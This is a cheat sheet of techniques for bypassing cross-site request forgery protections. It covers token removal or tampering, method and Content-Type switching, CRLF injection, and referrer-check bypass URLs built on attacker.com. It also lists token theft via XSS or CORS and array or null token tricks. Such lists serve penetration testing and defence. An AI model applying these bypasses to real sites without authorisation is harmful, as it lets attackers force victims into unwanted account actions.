- Remove the entire token parameter with value/Remove just the value.
- Use any other random but same length token.
- Use any other random (length-1) or (length+1) token.
- Use attacker's token in victim's session.
- Change the method from POST to GET and remove the token.
- If request is made through PUT or DELETE then try POST /profile/update?_method=PUT HTTP/1.1 or
POST /profile/update HTTP/1.1
Host: example.com
...
_method=PUT
- If token is sent through custom header; try to remove the header.
- Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/xml, application/xml.
- If double submit token is there (in cookies and some header) then try CRLF injection.
- Bypassing referrer check:
i. If the referrer header is checked but only when it exists in the request then add this piece of code in your csrf poc:<meta name="referrer" content="never">
ii. Regex Referral bypass:
https://attacker.com?target.com
https://attacker.com;target.com
https://attacker.com/target.com/../targetPATH
https://target.com.attacker.com
https://attackertarget.com
https://[email protected]
https://attacker.com#target.com
https://attacker.com\.target.com
https://attacker.com/.target.com
- CSRF token stealing via xss/htmli/cors.
- JSON Based:
i. Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data and check if it accepts.
ii. Use flash + 307 redirect. - Guessable CSRF token.
- Clickjacking to strong CSRF token bypass.
- Type Juggling.
- Array: newemail=[email protected]&csrftoken[]=lol
- Set the csrf token to "null" or add null bytes.
- Check whether csrf token is sent over http or sent to 3rd party. See here
- Generate multiple csrf tokens, observe the static part. Keep it as it is and play with the dynamic part.
Reference: